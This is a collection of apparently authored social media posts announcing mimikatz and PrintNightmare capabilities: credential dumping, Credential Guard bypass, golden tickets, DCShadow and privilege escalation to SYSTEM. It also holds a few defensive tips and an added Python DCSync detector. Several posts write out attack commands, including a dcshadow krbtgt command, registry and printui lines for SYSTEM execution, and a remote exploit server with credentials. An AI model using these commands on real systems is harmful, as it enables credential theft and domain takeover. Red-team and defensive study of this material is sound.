So #mimikatz wanted passwords, and Terminal Server has some for us 🔥
Cleartext passwords *decrypted* on a fully up-to-date Windows 2019 Server
No library, no previous code injection, and doesn't use a junk part of memory

Ping @jonasLyk, still in testing ... 🤪

Just released a new #mimikatz version to support Windows 10 1803 to bypass the Credential Guard authentication chain
Reminder: your passwords/keys are not in the secure world... only its storage **after** authentication!
@reni_ni this version is for you

Do you want to RDP on workstations / servers without limitations on the number of users?
(aka: another admin is already logged on this server)
Patch Terminal Server service with #mimikatz, now ready for Windows 10 1803

Now in #mimikatz 🔥, #mstsc credentials (passwords / PIN codes) for RDP / Remote Desktop Client
- ts::mstsc - on client credentials
- ts::logonpasswords - on server credentials
Does not rely on previously injected hook/library, useful on jumping servers

Little #printnightmare (ep 4.3) upgrade: user-to-system as a service 🔥
> Open SYSTEM prompt
connect to \\printnightmare[.]gentilkiwi[.]com (remove [ ]) with
- user: .\gentilguest
- password: password
Open 'Kiwi Legit Printer - x64', enjoy SYSTEM
(just one printer this time 🤪)

Want a quick & dirty (but supported by Microsoft) way to avoid #follina Office known payloads?
Just disable "Troubleshooting wizards" by GPO
HKLM\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics - EnableDiagnostics - 0
By CERT @banquedefrance

This #printnightmare / CVE-2021-1675 is really serious 🤪
Just adapted/simplified the original POC then:
*From Remote standard user to SYSTEM*
Here on a domain controller, but valid on all systems with RPC to spooler available, remote or local
➡️ disable the service now (no patch yet)

A new #mimikatz 🔥 release with #zerologon / CVE-2020-1472 detection, exploit, DCSync support and a lot of love inside ❤️
It now uses direct RPC calls (fast and supports unauthenticated on Windows)
Thank you: @SecuraBV

I updated #mimikatz to support Windows 1809, even the kernel driver! (with my expired certificate 😬)
Of course, misc::memssp to bypass the Credential Guard chain included
(but also, crypto, event log, terminal server... and passwords in clear when enabled!)

Gentle reminder: when you delete certificates on Windows, it does not delete the associated private keys on the disk...
Take a look in: %appdata%\Microsoft\Crypto\RSA (of all users)
A gift for forensics/data recovery, but also for #mimikatz and attackers...

yarh- for some reason on win11 the SAM file now is READ for users.
So if you have shadow volumes enabled you can read the SAM file like this:
I don't know the full extent of the issue yet, but it's too many to not be a problem I think.

Windows 365 is expensive and without basic security
Did #mimikatz dump my Azure *cleartext* password here? Or my Primary Refresh Token?
It's funny how you don't apply the best practices you recommend to customers to avoid securing by default

Using a Local Account, and have Windows Hello PIN code configured? ('cause Microsoft says it's more secure 🤷‍♂️)
Cleartext password is in the SYSTEM vault
TPM or not, #mimikatz loves your passwords 🥰
Thank you @tijldeneut for questions on it (I was too much on PRT)

Thanks to @cube0x0's work (& the damned RpcBindingSetObject function on Windows 🤬), a new #mimikatz 🔥 release using MS-PAR protocol instead of MS-RPRN
Now, #printnightmare / CVE-2021-34527 *everywhere*, not only domain controllers: servers & workstations

Always fabulous to see editors lower the Windows Security level
When Citrix SSO is enabled... passwords are stored in *user processes* (in addition to system ones)
Oh yeah, *even if you have Credential Guard*
Yeah, that's what Citrix is calling "SSO"
> Will be in #mimikatz 3 🔥

#mimikatz kitten edition!
Now supports saved passwords in RDG files (used with Remote Desktop Connection Manager)
🤷‍♂️ Friends don't let friends save passwords with DPAPI
You know it's ~like cleartext passwords? Especially with domain backup key?

By the way, #mimikatz bypassing Windows Defender detection (like a lot of other security products) is still as simple as being a little bit patient...
1. yep, they catch it without this delay...
2. yep, real time protection & cloud (without submission) are enabled

#printnightmare - Episode 3
You know that even patched, with default config (or security enforced with #Microsoft settings), a standard user can load drivers as SYSTEM?
- Local Privilege Escalation - #feature

So much fun this morning, a @Microsoft signed #mimikatz
Thank you @jxy__s for your research and such beautiful code
Now, will wait for people to understand that the "source file" can really be another thing than a file on the disk

That's getting ridiculous
calc.exe (or any other program) detected as #mimikatz because of "sekurlsa" arguments 🤷‍♂️
All that NextGen / IA / Cloud / Behavior detection is too much for me

Q: what can you do when you have #mimikatz 🔥 & some Read access on Windows system files like SYSTEM, SAM and SECURITY?
A: Local Privilege Escalation 🥳
Thank you @jonasLyk for this Read access on default Windows

Do you know how to get cleartext passwords of users, at logon, in a Windows 10?
Especially with Credential Guard enabled?
#mimikatz
It's easy as an Authentication Package (mimilib) or a piece of code injected...

That epic Microsoft moment ❤️ #cve20200601 #curveball
Recently worked on #mimikatz and ECC, so yes, 10 and 2016/2019 only.
Previous versions like Windows 7 did not support personal EC curves (only a few NIST standard ones)

Hey @_dirkjan, I just tested your #PrivExchange attack on a 2019 DC with 2019 Exchange (without separate administration at install)
It works like a charm, so much class with this attack, I'm so loving it.
Thank you for your work, and @agsolino for #impacket too 🥰

I was told you like SCCM passwords & #mimikatz 🔥
Did you know SCCM *endpoints* can keep credentials of all your Network Access Accounts?
Time to try the new dpapi::sccm command and to check the privileges associated with them

I'm sure you want to test #mimikatz 🔥 DCShadow by yourself: (@mysmartlogon rocked the code)
Eg: lsadump::dcshadow /object:CN=krbtgt,CN=Users,DC=lab,DC=local /attribute:ntPwdHistory /value:00112233445566778899aabbccddeeff000102030405060708090a0b0c0d0e0f

It's time to play with #mimikatz 🔥 & #kekeo & #impacket
If you have a Windows PKI with its WebServer, you'll have problems 🤪
No authentication/credential to *full domain owned*
@topotam77: EFS & PetitPotam
@ExAndroidDev: PR

Want to get a usable Kerberos TGT without admin rights/allowtgtsessionkey?
It's easy with a delegation ticket! (enabled by default...)
No special requirement, just some love
Thank you @elad_shamir (and @TheColonial) for evil ideas!

Dump *domain* (& generic) Windows credentials from the Credential Manager without admin!
#mimikatz *needs domain user rights (or user password, of course!)
Something makes me think that a little howto would interest you ...

#mimikatz is now able to decrypt Credential Guard blobs when you have access to Secure World keys (here a vmem file of VMware)
Thanks to @FSecureLabs & @TimoHirvonen for dumps & work -- more to come with their (mini)dumping ideas with #physmem2profit

Did you know #mimikatz can patch RDP server to allow multiple simultaneous sessions, workstations or servers?
(because some people do not like the command line)

New Windows Domain Controller compromise: with #mimikatz: set *PREVIOUS* krbtgt keys (here the RC4 one) - and welcome golden tickets!
** Who's auditing setting the previous key? 🤪 **
Thank you to @mysmartlogon and the god of crypto bugs! (#soon on the release section)

- have NTLM hash of a DC?
- need computer/server/dc NTLM/RC4 key?
- ...but afraid to make silver ticket and/or DCSync (detection)?
Use NT 3.5 protocol against a 2019 DC, because, yes: LEGACY 🤷‍♂️
(so old, but so good: )

Want to block [MS-EFSR] / #PetitPotam calls?
Use RPC filters! 🥳
put the previous Tweet in a file: `block_efsr.txt` then:
> netsh -f block_efsr.txt
Just tested: it blocks remote connections & not local EFS usage
Thank you to @CraigKirby for reminding us of this RPC filter technology!

I rewrote #mimikatz 🔥 code for #printnightmare
- less calls (can be in only 1 call, LPE or RCE) ;
- more efficient ;
- mimispool library can be modified to be a real driver ;
- supports Windows 7 to Windows 11 (TPM or not 🤪)
After a few tweakings, #printnightmare - Episode 4.1
Now works from any computer, even not domain joined
User to SYSTEM
But I don't understand... Windows 11 with VBS security & TPM 2.0 doesn't protect me?

Want to test #printnightmare (ep 4.x) user-to-system as a service? 🔥
(POC only, will write a log file to system32)
connect to \\ with
- user: .\gentilguest
- password: password
Open 'Kiwi Legit Printer - x64', then 'Kiwi Legit Printer - x64 (another one)'

Updated #printnightmare flow chart
Yes, LPE is possible under certain circumstances even if you disable the Print Spooler service's inbound remote printing
#mimikatz update on its way

I just pushed a new #mimikatz release to support Windows 10 1903 (build 18362)
Even the driver (not really well signed - but loadable) is in the package.
Oh, yes, misc::memssp still works to hook and get passwords 🤷‍♂️
Because I had questions about "Protected Process" and LSA (RunAsPPL), don't forget that #mimikatz driver (mimidriver) can remove the Flags without any reboot or UEFI program
And yes, this is also for Windows 10 1903 x64 & x86
#mimikatz 2 + #kekeo 2 = #mimikatz 3 🔥
* ASN.1 encode+decode (no more #kekeo impossible build)
* Submodules (no more gigantic misc::)
* VS 2019 Community (no more VS2010/2012 tricks)
* International input/output
* & more...!
Still supports Windows XP 🤪
...coding in progress

Customers waiting for official Microsoft communication about #printnightmare 4.x (user to SYSTEM)
"We are investigating and will take appropriate action as needed to help keep customers protected."

Decrypting credentials with #mimikatz & DPAPI is fun.
But recreating masterkeys on your own machine to deal with all credentials is cool too.
Especially when you can steal browser sessions and bypass 2FA with user's cookies
Want to try to decode SCCM passwords in the SC_UserAccount table with #mimikatz? 🔥
(hint: lots of them usually have admin rights 🤪)
A little POC here:
So @bugch3ck can try it ;)

I just pushed the first #mimikatz version of the year
Supports RSA, DSA & EC(DH|DSA) keys:
- export (even when not exportable)
- convert from different formats (PVK, blob, PKCS#8, PEM, DER, ...) to PKCS#8
- build your PKCS#12 (pfx) from raw keys & certificates
New #mimikatz release to test the new ts::logonpasswords feature (experimental) 🔥
- Only with active users
- Only tested on 2012R2/2016/2019 + some Windows 10 LTSC
* Do not hesitate to make some tests @awakecoding @jonasLyk @FuzzySec @n00py1 etc. 🤪

Because it's "easy" to monitor the clipboard content from #mimikatz to get sensitive data (or garbage text)
(not related to Keepass, but you can understand the idea more easily)

Wait @Microsoft, are you sure about your new Q/A mechanism in Windows 1803?
(at least, the password is not stored in cleartext in the vault like in previous versions)
Test with #mimikatz by yourself:
Thanks a lot @mihi42 ( )

Dealing with strings & filenames is hard
New function in #mimikatz 🔥 code to normalize filenames (bypassing checks by using UNC instead of \\server\share format)
So an RCE (and LPE) with #printnightmare on a fully patched server, with Point & Print enabled
Would you like to try to dump your #Windows365 Azure passwords in the Web Interface too?
A new #mimikatz 🔥 release is here to test!
(Remote Desktop client still works, of course!)
cc: @awakecoding @RyMangan

Oh, by the way, #curveball #cve20200601 is not only about TLS & Authenticode... it's also for S/MIME and other signatures.
Yes, it's also valid against #Outlook mail signature verification ❤️
I hope nobody relies on it for legal / workflow validation

Don't you think #mimikatz 3 is sexier with #kekeo inside?
Still compatible with Windows XP,
Without custom compiler this time (VS2019+ Community+)
Without commercial ASN.1 library

In an enterprise environment (domain/user single sign on) you can make some dirty tricks with #printnightmare...
reg add "HKCU\Printers\Connections\,,print.lab.local,Kiwi Legit Printer" /f /v Provider /t REG_SZ /d win32spl.dll
Next user logon or spooler refresh, SYSTEM execution

A quick & dirty #Splunk search to detect basic #mimikatz DCSync with DC security events:
(specify your index!)
Seems to detect normal account, golden & silver ticket usage to DCSync.
One exception: (with the original meme inside)

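As an added defender-side example (not the author's Splunk search, which is not reproduced on the page), the same detection idea in Python over constructed 4662 event lines: a DCSync request appears as Security event 4662 whose Properties carry the directory-replication control-access GUIDs, from an account that is not a known domain controller. The flattened key=value log format, the sample accounts and the DC allow-list are assumptions.

```python
import re

# Control-access rights a DCSync caller requests on the domain naming context
# (well-known Active Directory extended-rights GUIDs).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"([0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12})", re.I)
KV_RE = re.compile(r"(\w+)=((?:(?!\s\w+=).)*)")  # key=value pairs; values may contain spaces
# Constructed sample of Security events flattened to key=value pairs, as a SIEM might index
# them (not real logs): DC-to-DC replication, a DCSync by a user account, then noise.
SAMPLE_EVENTS = """\
EventCode=4662 SubjectUserName=DC01$ SubjectDomainName=LAB Properties=%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} AccessMask=0x100
EventCode=4662 SubjectUserName=alice SubjectDomainName=LAB Properties=%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} AccessMask=0x100
EventCode=4662 SubjectUserName=bob SubjectDomainName=LAB Properties=%%7688 {bf967a86-0de6-11d0-a285-00aa003049e2} AccessMask=0x10
EventCode=4624 SubjectUserName=alice SubjectDomainName=LAB LogonType=3
"""

def parse_event(line):
    """Turn one flattened 'key=value key=value' line into a dict."""
    return {m.group(1): m.group(2).strip() for m in KV_RE.finditer(line)}

def replication_rights(event, dc_accounts=frozenset()):
    """Replication rights named in a 4662 from an account not listed in dc_accounts.

    dc_accounts (assumption) holds the DCs' computer accounts, e.g. {"DC01$"}. Excluding on
    the name alone is weak: corroborate with the request's source address. () = not DCSync-like."""
    if event.get("EventCode") != "4662":
        return ()
    if event.get("SubjectUserName", "").upper() in {a.upper() for a in dc_accounts}:
        return ()
    requested = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    return tuple(sorted(REPLICATION_GUIDS[g] for g in requested & REPLICATION_GUIDS.keys()))

def find_dcsync(log_text, dc_accounts=frozenset()):
    """Scan flattened events; return [(DOMAIN\\user, rights), ...] for DCSync-like requests."""
    alerts = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        rights = replication_rights(ev, dc_accounts)
        if rights:
            alerts.append((f"{ev.get('SubjectDomainName', '?')}\\{ev.get('SubjectUserName', '?')}", rights))
    return alerts

if __name__ == "__main__":
    # With DC01$ excluded only alice's request is reported; without the list, DC01$ is too.
    for who, rights in find_dcsync(SAMPLE_EVENTS, {"DC01$"}):
        print(who, "->", ", ".join(rights))
```

Whether the caller authenticated with a real password, a golden or a silver ticket makes no difference to 4662, which is why the name-based DC exclusion is the only blind spot of this check.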
But my favorite (for now) #printnightmare dirty trick is: *as a standard user* the way to *force* all other users/admins of a workstation/server to install printers
rundll32 printui,PrintUIEntry /ga /n"\\print.lab.local\Kiwi Legit Printer"
Rpc(Async)AddPerMachineConnection

CredSSP with "Default Credentials Delegation" keeps passwords in client memory, but you must *also* secure the target
Impersonation/Admin/System/Tickets (Golden or not...) lets a standard user (or...) get its password 🤪
Not in #mimikatz, try #kekeo

If you get the smartcard of a user, #mimikatz can extract its NTLM hash if its authentication is cached...
even offline/without DC interaction...
cc: @agsolino

I did almost forget that #mimikatz can run without using the infamous debug privilege...
the default with XP/2003, but also if you're SYSTEM on newer platforms
(like in some Meterpreter sessions)
Stop thinking removing debug privilege from administrators will stop #mimikatz

Very (very) soon in #mimikatz 🔥
Client RDP passwords/PIN in MSTSC process, decrypted.
Without previous injection/hook in process, of course
Especially useful on jump servers 🤪
~ Can also be used to debug some internal properties ~

#cve20200601 #curveball last use case for today
Yes, it's also dangerous for Microsoft VBA macros (especially when you think "Disable all Macros except digitally signed" will protect you)

#printnightmare - Episode 4
You know what is better than a Legit Kiwi Printer?
🔥 Another Legit Kiwi Printer...
No prerequisite at all, you don't even need to sign drivers/packages 🤪

#mimikatz update to support new @googlechrome encryption for Credentials & Cookies (AES-256-GCM with a global AES key protected by DPAPI)
(still supports the legacy DPAPI too)
Thank you @kevinmitnick & @riflon for the report
Moaaaar credentials 🤪
Thanks to Rory McNamara 🥰 ( ) _and a big SQLITE3 lib update_, #mimikatz can now open Chrome saved passwords & cookies databases already opened by Chrome (without making a copy of them somewhere..)
Be efficient and use it as is!
Official tool 'dpapimig' (and RPC) needs the user's SID & password... in some 'test' situations you don't have that password, but maybe:
NTLM hash, SHA1 hash, DPAPI hash, Kerberos ticket, krbtgt, DC$, domain Backup keys...
So many options with #mimikatz
I just pushed a #mimikatz update to deal with #PowerShell PSCredential & SecureString saved in XML files 😬
You can deal with them in the same ways as other DPAPI blobs: local system, rpc, password, hash, domain backup key...
More credentials love 🥰
#printnightmare 4.x - lots of ❤️ to the printnightmare[.]gentilkiwi[.]com Internet server, but some wanted to have a LAN server.
Legit: many companies don't allow outbound SMB traffic (as do some ISPs)
> Some PowerShell commands to help: (& new mimispool.dll)

I'm not a hash/password cracker, but some of you are.
For the love of @tifkin_, @harmj0y and @hashcat, #mimikatz can now patch LSASS to force NTLM Server challenge to 0x1122334455667788
(still experimental: W7-SP1 and W10-1709 only at this time)